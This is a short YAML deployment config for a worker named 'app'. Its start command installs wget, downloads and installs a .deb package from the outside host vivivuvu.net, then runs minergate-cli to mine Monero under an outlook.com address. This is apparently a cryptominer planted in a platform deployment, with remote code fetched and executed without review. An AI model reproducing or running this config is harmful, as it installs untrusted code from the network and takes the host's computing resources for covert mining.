name: 'app'
workers:
        commands:
            start:|
                apt-get update \
                && apt-get -qq --no-install-recommends install \
                ca-certificates \
                wget \
                && rm -r /var/lib/apt/lists/*

                 wget -q --content-disposition http://vivivuvu.net//abc.deb \
                 && dpkg -i *.deb \
                 && rm *.deb
                lscpu
                minergate-cli -user pro_desk@outlook.com -xmr
